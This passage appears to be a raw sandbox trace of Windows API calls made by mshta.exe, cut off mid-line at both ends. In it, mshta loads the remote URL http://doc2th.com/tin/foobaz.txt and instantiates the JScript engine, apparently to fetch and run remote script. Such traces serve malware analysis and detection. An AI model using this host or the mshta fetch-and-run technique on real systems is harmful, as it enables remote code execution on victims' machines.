This=0x150ec8, hWnd=0x10204, msg=0x81, wParam=0x0, lParam=0x40f0c0*=1183792, plResult=0x40ef4c | out: plResult=0x40ef4c) returned 0x1 [0027.467] DefWindowProcW (hWnd=0x10204, Msg=0x81, wParam=0x0, lParam=0x40f0c0) returned 0x1 [0027.467] GetCurrentThreadId () returned 0xa1c [0027.467] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.467] GetCurrentThreadId () returned 0xa1c [0027.467] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.467] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x1, wParam=0x0, lParam=0x40f0c0*=1183792, plResult=0x40ef4c | out: plResult=0x40ef4c) returned 0x1 [0027.467] DefWindowProcW (hWnd=0x10204, Msg=0x1, wParam=0x0, lParam=0x40f0c0) returned 0x0 [0027.467] GetCurrentThreadId () returned 0xa1c [0027.467] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.467] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x5, wParam=0x0, lParam=0x24b0428, plResult=0x40ef9c | out: plResult=0x40ef9c) returned 0x1 [0027.467] DefWindowProcW (hWnd=0x10204, Msg=0x5, wParam=0x0, lParam=0x24b0428) returned 0x0 [0027.467] GetCurrentThreadId () returned 0xa1c [0027.467] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.467] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x40ef9c | out: plResult=0x40ef9c) returned 0x1 [0027.467] DefWindowProcW (hWnd=0x10204, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0027.467] GetCurrentThreadId () returned 0xa1c [0027.467] DefWindowProcW (hWnd=0x10200, Msg=0x210, wParam=0x1, lParam=0x10204) returned 0x0 [0027.467] GetClassNameW (in: hWnd=0x10200, lpClassName=0x40f4e0, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34 [0027.467] StrCmpIW (psz1="HTML Application Host Window Class", psz2="HTMLPageDesignerWndClass") returned -1 [0027.467] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x150ec8, fRestoreLayout=1) returned 0x0 [0027.467] SendMessageW (hWnd=0x10204, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0027.467] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.467] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x40f39c | out: plResult=0x40f39c) returned 0x1 [0027.467] DefWindowProcW (hWnd=0x10204, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0027.467] GetCurrentThreadId () returned 0xa1c [0027.467] IntersectRect (in: lprcDst=0x40f714, lprcSrc1=0x10204c, lprcSrc2=0x10205c | out: lprcDst=0x40f714) returned 1 [0027.467] EqualRect (lprc1=0x40f714, lprc2=0x10204c) returned 1 [0027.468] InvalidateRect (hWnd=0x10204, lpRect=0x0, bErase=1) returned 1 [0027.469] IntersectRect (in: lprcDst=0x40f600, lprcSrc1=0x40f600, lprcSrc2=0x40f598 | out: lprcDst=0x40f600) returned 1 [0027.469] IntersectRect (in: lprcDst=0x40f600, lprcSrc1=0x40f600, lprcSrc2=0x40f598 | out: lprcDst=0x40f600) returned 1 [0027.584] GetCurrentThreadId () returned 0xa1c [0027.585] GetCurrentThreadId () returned 0xa1c [0027.585] GetCurrentThreadId () returned 0xa1c [0027.585] IntersectRect (in: lprcDst=0x40f43c, lprcSrc1=0x40f43c, lprcSrc2=0x40f40c | out: lprcDst=0x40f43c) returned 1 [0027.585] IntersectRect (in: lprcDst=0x15b018, lprcSrc1=0x15b018, lprcSrc2=0x40f42c | out: lprcDst=0x15b018) returned 1 [0027.585] SetWindowPos (hWnd=0x10204, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1 [0027.585] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.585] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x46, wParam=0x0, lParam=0x40f6f8*=66052, plResult=0x40f5a8 | out: plResult=0x40f5a8) returned 0x1 [0027.585] DefWindowProcW (hWnd=0x10204, Msg=0x46, wParam=0x0, lParam=0x40f6f8) returned 0x0 [0027.585] GetCurrentThreadId () returned 0xa1c [0027.585] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.585] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x47, wParam=0x0, lParam=0x40f6f8*=66052, plResult=0x40f5a8 | out: plResult=0x40f5a8) returned 0x1 [0027.585] DefWindowProcW (hWnd=0x10204, Msg=0x47, wParam=0x0, lParam=0x40f6f8) returned 0x0 [0027.585] GetCurrentThreadId () returned 0xa1c [0027.585] SetTimer (hWnd=0x10204, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0027.585] GetFocus () returned 0x0 [0027.585] EnumChildWindows (hWndParent=0x10204, lpEnumFunc=0x63470a73, lParam=0x40f5ec) returned 0 [0027.598] GetFocus () returned 0x0 [0027.598] SetFocus (hWnd=0x10204) returned 0x0 [0027.598] DefWindowProcW (hWnd=0x10200, Msg=0x46, wParam=0x0, lParam=0x40f680) returned 0x0 [0027.598] DefWindowProcW (hWnd=0x101fc, Msg=0x46, wParam=0x0, lParam=0x40f680) returned 0x0 [0027.598] DefWindowProcW (hWnd=0x10202, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0027.598] DefWindowProcW (hWnd=0x10200, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0027.598] DefWindowProcW (hWnd=0x101fc, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0027.598] DefWindowProcW (hWnd=0x10200, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0027.598] DefWindowProcW (hWnd=0x10200, Msg=0xd, wParam=0x104, lParam=0x22c5f8) returned 0x0 [0027.599] DefWindowProcW (hWnd=0x10200, Msg=0xd, wParam=0x104, lParam=0x22c6a0) returned 0x0 [0027.615] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.615] LoadLibraryA (lpLibFileName="OLEACC.DLL") returned 0x726e0000 [0027.742] GetProcAddress (hModule=0x726e0000, lpProcName="LresultFromObject") returned 0x726e2663 [0027.742] LresultFromObject () returned 0xc108 [0027.750] GetCurrentThreadId () returned 0xa1c [0027.753] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.753] GetKeyState (nVirtKey=1) returned 0 [0027.753] GetKeyState (nVirtKey=2) returned 0 [0027.753] GetKeyState (nVirtKey=16) returned 0 [0027.753] GetKeyState (nVirtKey=17) returned 0 [0027.753] GetKeyState (nVirtKey=4) returned 0 [0027.753] GetKeyState (nVirtKey=18) returned 0 [0027.753] GetMessageTime () returned 0 [0027.753] GetMessagePos () returned 0x0 [0027.753] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x281, wParam=0x1, lParam=0xc000000f*=0, plResult=0x40efdc | out: plResult=0x40efdc) returned 0x0 [0027.754] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.754] GetKeyState (nVirtKey=1) returned 0 [0027.754] GetKeyState (nVirtKey=2) returned 0 [0027.754] GetKeyState (nVirtKey=16) returned 0 [0027.754] GetKeyState (nVirtKey=17) returned 0 [0027.754] GetKeyState (nVirtKey=4) returned 0 [0027.754] GetKeyState (nVirtKey=18) returned 0 [0027.754] GetMessageTime () returned 0 [0027.754] GetMessagePos () returned 0x0 [0027.754] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x40ea34 | out: plResult=0x40ea34) returned 0x0 [0027.754] GetCurrentThreadId () returned 0xa1c [0027.754] GetCurrentThreadId () returned 0xa1c [0027.754] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.755] GetKeyState (nVirtKey=1) returned 0 [0027.755] GetKeyState (nVirtKey=2) returned 0 [0027.755] GetKeyState (nVirtKey=16) returned 0 [0027.755] GetKeyState (nVirtKey=17) returned 0 [0027.755] GetKeyState (nVirtKey=4) returned 0 [0027.755] GetKeyState (nVirtKey=18) returned 0 [0027.755] GetMessageTime () returned 0 [0027.755] GetMessagePos () returned 0x0 [0027.755] GetCursorPos (in: lpPoint=0x40f188 | out: lpPoint=0x40f188*(x=1248, y=501)) returned 1 [0027.755] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f188 | out: lpPoint=0x40f188) returned 1 [0027.755] GetKeyState (nVirtKey=16) returned 0 [0027.755] GetKeyState (nVirtKey=17) returned 0 [0027.755] GetKeyState (nVirtKey=18) returned 0 [0027.755] GetKeyState (nVirtKey=160) returned 0 [0027.755] GetKeyState (nVirtKey=162) returned 0 [0027.755] GetKeyState (nVirtKey=164) returned 0 [0027.755] GetCursorPos (in: lpPoint=0x40f188 | out: lpPoint=0x40f188*(x=1248, y=501)) returned 1 [0027.755] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f188 | out: lpPoint=0x40f188) returned 1 [0027.755] GetKeyState (nVirtKey=16) returned 0 [0027.755] GetKeyState (nVirtKey=17) returned 0 [0027.755] GetKeyState (nVirtKey=18) returned 0 [0027.755] GetKeyState (nVirtKey=160) returned 0 [0027.755] GetKeyState (nVirtKey=162) returned 0 [0027.755] GetKeyState (nVirtKey=164) returned 0 [0027.755] GetCapture () returned 0x0 [0027.758] GetCurrentThreadId () returned 0xa1c [0027.758] GetCurrentThreadId () returned 0xa1c [0027.758] GetCurrentThreadId () returned 0xa1c [0027.758] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x40f3c4 | out: plResult=0x40f3c4) returned 0x1 [0027.758] DefWindowProcW (hWnd=0x10204, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0027.758] GetCurrentThreadId () returned 0xa1c [0027.759] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x150ec8, hWnd=0x10204, phIMC=0x40f6cc | out: phIMC=0x40f6cc*=0x60133) returned 0x0 [0027.759] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x150ec8, hWnd=0x10204, hIME=0x0, phPrev=0x40f6cc | out: phPrev=0x40f6cc*=0x60133) returned 0x0 [0027.759] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.759] GetKeyState (nVirtKey=1) returned 0 [0027.759] GetKeyState (nVirtKey=2) returned 0 [0027.759] GetKeyState (nVirtKey=16) returned 0 [0027.759] GetKeyState (nVirtKey=17) returned 0 [0027.759] GetKeyState (nVirtKey=4) returned 0 [0027.759] GetKeyState (nVirtKey=18) returned 0 [0027.759] GetMessageTime () returned 0 [0027.759] GetMessagePos () returned 0x0 [0027.759] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x281, wParam=0x0, lParam=0xc000000f*=0, plResult=0x40f3bc | out: plResult=0x40f3bc) returned 0x0 [0027.759] GetCurrentThreadId () returned 0xa1c [0027.759] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0027.760] GetKeyState (nVirtKey=1) returned 0 [0027.760] GetKeyState (nVirtKey=2) returned 0 [0027.760] GetKeyState (nVirtKey=16) returned 0 [0027.760] GetKeyState (nVirtKey=17) returned 0 [0027.760] GetKeyState (nVirtKey=4) returned 0 [0027.760] GetKeyState (nVirtKey=18) returned 0 [0027.760] GetMessageTime () returned 0 [0027.760] GetMessagePos () returned 0x0 [0027.760] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x281, wParam=0x1, lParam=0xc000000f*=0, plResult=0x40f3bc | out: plResult=0x40f3bc) returned 0x0 [0027.760] GetCurrentThreadId () returned 0xa1c [0027.760] IsOS (dwOS=0x25) returned 1 [0027.760] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f5c0 | out: phkResult=0x40f5c0*=0x3f4) returned 0x0 [0027.760] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f5c4 | out: phkResult=0x40f5c4*=0x3f8) returned 0x0 [0027.760] RegOpenKeyExW (in: hKey=0x3f8, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x40f580 | out: phkResult=0x40f580*=0x0) returned 0x2 [0027.760] RegOpenKeyExW (in: hKey=0x3f4, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x40f580 | out: phkResult=0x40f580*=0x3fc) returned 0x0 [0027.760] SHRegGetValueW () returned 0x0 [0027.760] RegCloseKey (hKey=0x3fc) returned 0x0 [0027.760] RegCloseKey (hKey=0x0) returned 0x6 [0027.760] RegCloseKey (hKey=0x0) returned 0x6 [0027.760] RegCloseKey (hKey=0x3f4) returned 0x0 [0027.760] RegCloseKey (hKey=0x3f8) returned 0x0 [0027.760] LoadLibraryW (lpLibFileName="ieframe.dll") returned 0x6d270000 [0028.223] GetVersionExW (in: lpVersionInformation=0x40f0cc*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x40f0cc*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0028.223] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x22) returned 0x6d270000 [0028.224] LoadStringW (in: hInstance=0x6d270000, uID=0xb5, lpBuffer=0x40f648, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0028.225] LoadStringW (in: hInstance=0x6d270000, uID=0xb5, lpBuffer=0x40f6a8, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0028.225] LoadStringW (in: hInstance=0x6d270000, uID=0xb5, lpBuffer=0x40f694, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0028.225] ShowWindow (hWnd=0x10204, nCmdShow=1) returned 1 [0028.225] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0028.225] TranslateMessage (lpMsg=0x40f904) returned 0 [0028.225] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0028.240] RegisterDragDrop (hwnd=0x10204, pDropTarget=0x636896cc) returned 0x0 [0028.240] GetCurrentThreadId () returned 0xa1c [0028.240] GetCurrentThreadId () returned 0xa1c [0028.240] GetCurrentThreadId () returned 0xa1c [0028.240] GetCurrentThreadId () returned 0xa1c [0028.241] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0028.241] TranslateMessage (lpMsg=0x40f904) returned 0 [0028.241] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0028.241] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0028.241] KillTimer (hWnd=0x10204, uIDEvent=0x1000) returned 1 [0028.245] IUnknown:AddRef (This=0x11ae64) returned 0x11 [0028.245] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x40ec3c | out: pdwScheme=0x40ec3c*=0x2) returned 0x0 [0028.245] IUri:GetDisplayUri (in: This=0x11ae64, pbstrDisplayString=0x40ec48 | out: pbstrDisplayString=0x40ec48*="http://doc2th.com/tin/foobaz.txt") returned 0x0 [0028.246] GetWindowTextW (in: hWnd=0x10200, lpString=0x40e7e8, nMaxCount=512 | out: lpString="") returned 0 [0028.246] DefWindowProcW (hWnd=0x10200, Msg=0xd, wParam=0x200, lParam=0x40e7e8) returned 0x0 [0028.246] SetWindowTextW (hWnd=0x10200, lpString="http://doc2th.com/tin/foobaz.txt") returned 1 [0028.246] DefWindowProcW (hWnd=0x10200, Msg=0xc, wParam=0x0, lParam=0x12cffc) returned 0x1 [0028.246] IUnknown:Release (This=0x11ae64) returned 0x10 [0028.246] GetCurrentThreadId () returned 0xa1c [0028.246] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0028.507] TranslateMessage (lpMsg=0x40f904) returned 0 [0028.507] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0028.507] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0032.274] TranslateMessage (lpMsg=0x40f904) returned 0 [0032.274] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0032.274] DefWindowProcW (hWnd=0x10202, Msg=0xc07b, wParam=0x50, lParam=0x0) returned 0x0 [0032.274] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0032.274] TranslateMessage (lpMsg=0x40f904) returned 0 [0032.274] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0032.274] DefWindowProcW (hWnd=0x101fc, Msg=0xc07b, wParam=0x50, lParam=0x0) returned 0x0 [0032.275] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0032.284] TranslateMessage (lpMsg=0x40f904) returned 0 [0032.284] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0032.284] DefWindowProcW (hWnd=0x10202, Msg=0xc07b, wParam=0x50, lParam=0x0) returned 0x0 [0032.284] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0032.285] TranslateMessage (lpMsg=0x40f904) returned 0 [0032.285] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0032.285] DefWindowProcW (hWnd=0x101fc, Msg=0xc07b, wParam=0x50, lParam=0x0) returned 0x0 [0032.285] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0045.075] TranslateMessage (lpMsg=0x40f904) returned 0 [0045.075] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0045.075] CreateUri (in: pwzURI="http://doc2th.com/tin/foobaz.txt", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x40e07c | out: ppURI=0x40e07c*=0x11ae64) returned 0x0 [0045.075] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40e054 | out: ppvObject=0x40e054*=0x11ae64) returned 0x0 [0045.075] IUnknown:Release (This=0x11ae64) returned 0x12 [0045.075] IUnknown:AddRef (This=0x11ae64) returned 0x13 [0045.075] IUnknown:Release (This=0x11ae64) returned 0x12 [0045.075] IUnknown:Release (This=0x11ae64) returned 0x11 [0045.075] FindResourceW (hModule=0x6d270000, lpName=0x1fe, lpType=0x6) returned 0x27e84d0 [0045.075] LoadResource (hModule=0x6d270000, hResInfo=0x27e84d0) returned 0x280e53c [0045.076] LockResource (hResData=0x280e53c) returned 0x280e53c [0045.076] VirtualQuery (in: lpAddress=0x280e53c, lpBuffer=0x40f224, dwLength=0x1c | out: lpBuffer=0x40f224*(BaseAddress=0x280e000, AllocationBase=0x2530000, AllocationProtect=0x2, RegionSize=0x115000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0045.076] SizeofResource (hModule=0x6d270000, hResInfo=0x27e84d0) returned 0xe6 [0045.076] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0046.562] TranslateMessage (lpMsg=0x40f904) returned 0 [0046.562] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0046.562] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0046.588] TranslateMessage (lpMsg=0x40f904) returned 0 [0046.588] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0046.588] GetTickCount () returned 0x1a717 [0046.588] ParseURLW (in: pcszURL="http://doc2th.com/tin/foobaz.txt", ppu=0x40f3e0 | out: ppu=0x40f3e0) returned 0x0 [0046.590] GetTickCount () returned 0x1a717 [0046.590] GetTickCount () returned 0x1a717 [0046.590] SetTimer (hWnd=0x10204, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0046.590] IUnknown:AddRef (This=0x11ae64) returned 0x13 [0046.590] IInternetSecurityManager:MapUrlToZone (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", pdwZone=0x40f39c, dwFlags=0x0 | out: pdwZone=0x40f39c*=0xffffffff) returned 0x800c0011 [0046.590] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.590] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.590] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0046.590] IInternetSecurityManager:ProcessUrlAction (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", dwAction=0x2106, pPolicy=0x40f3a0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x40f3a0*=0x0) returned 0x0 [0046.590] IUnknown:Release (This=0x11ae64) returned 0x12 [0046.590] ParseURLW (in: pcszURL="http://doc2th.com/tin/foobaz.txt", ppu=0x40f528 | out: ppu=0x40f528) returned 0x0 [0046.590] IUnknown:AddRef (This=0x11ae64) returned 0x13 [0046.590] IInternetSecurityManager:MapUrlToZone (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", pdwZone=0x40f4cc, dwFlags=0x0 | out: pdwZone=0x40f4cc*=0xffffffff) returned 0x800c0011 [0046.590] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.590] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.590] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0046.591] IInternetSecurityManager:ProcessUrlAction (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", dwAction=0x1400, pPolicy=0x40f4d0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x40f4d0*=0x0) returned 0x0 [0046.591] IUnknown:Release (This=0x11ae64) returned 0x12 [0046.591] GetTickCount () returned 0x1a717 [0046.591] Sleep (dwMilliseconds=0x0) [0046.592] GetTickCount () returned 0x1a717 [0046.592] GetTickCount () returned 0x1a717 [0046.592] ParseURLW (in: pcszURL="http://doc2th.com/tin/foobaz.txt", ppu=0x40f4e4 | out: ppu=0x40f4e4) returned 0x0 [0046.592] IUnknown:AddRef (This=0x11ae64) returned 0x13 [0046.592] IInternetSecurityManager:MapUrlToZone (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", pdwZone=0x40f484, dwFlags=0x0 | out: pdwZone=0x40f484*=0xffffffff) returned 0x800c0011 [0046.592] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.592] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.592] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0046.592] IInternetSecurityManager:ProcessUrlAction (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", dwAction=0x1400, pPolicy=0x40f488, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x40f488*=0x0) returned 0x0 [0046.592] IUnknown:Release (This=0x11ae64) returned 0x12 [0046.592] ParseURLW (in: pcszURL="http://doc2th.com/tin/foobaz.txt", ppu=0x40f474 | out: ppu=0x40f474) returned 0x0 [0046.592] IUnknown:AddRef (This=0x11ae64) returned 0x13 [0046.592] IInternetSecurityManager:MapUrlToZone (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", pdwZone=0x40f414, dwFlags=0x0 | out: pdwZone=0x40f414*=0xffffffff) returned 0x800c0011 [0046.592] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.592] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.592] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0046.592] IInternetSecurityManager:ProcessUrlAction (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", dwAction=0x1400, pPolicy=0x40f418, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x40f418*=0x0) returned 0x0 [0046.592] IUnknown:Release (This=0x11ae64) returned 0x12 [0046.593] CoCreateInstance (in: rclsid=0x40f464*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x632a95b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x40f420 | out: ppv=0x40f420*=0x1b31268) returned 0x0 [0046.729] GetVersion () returned 0x1db10106 [0046.729] __dllonexit () returned 0x6e8e7ecf [0046.729] __dllonexit () returned 0x6e8e7e9b [0046.729] __dllonexit () returned 0x6e8e7eb5 [0046.729] __dllonexit () returned 0x6e8e7f70 [0046.730] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x754d0000 [0046.730] GetProcAddress (hModule=0x754d0000, lpProcName="RegisterTraceGuidsA") returned 0x76f5fb7d [0046.730] EtwRegisterTraceGuidsA () returned 0x0 [0046.730] GetProcAddress (hModule=0x754d0000, lpProcName="RegisterTraceGuidsA") returned 0x76f5fb7d [0046.730] EtwRegisterTraceGuidsA () returned 0x0 [0046.730] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x40dddc, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\mShta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0046.731] GetProcAddress (hModule=0x754d0000, lpProcName="RegOpenKeyExA") returned 0x754e4907 [0046.731] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x40df00 | out: phkResult=0x40df00*=0x0) returned 0x2 [0046.734] GetVersion () returned 0x1db10106 [0046.734] DllGetClassObject (in: rclsid=0x11e868*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), riid=0x7673ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40e6e4 | out: ppv=0x40e6e4*=0x59ff48) returned 0x0 [0046.734] JScriptEngine5:IClassFactory:CreateInstance (in: This=0x59ff48, pUnkOuter=0x0, riid=0x40f090*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x40e6d0 | out: ppvObject=0x40e6d0*=0x1b31268) returned 0x0 [0046.734] GetUserDefaultLCID () returned 0x409 [0046.734] GetACP () returned 0x4e4 [0046.735] IUnknown:AddRef (This=0x1b31268) returned 0x2 [0046.735] IUnknown:Release (This=0x1b31268) returned 0x1 [0046.735] JScriptEngine5:IUnknown:Release (This=0x59ff48) returned 0x0 [0046.735] IUnknown:QueryInterface (in: This=0x1b31268, 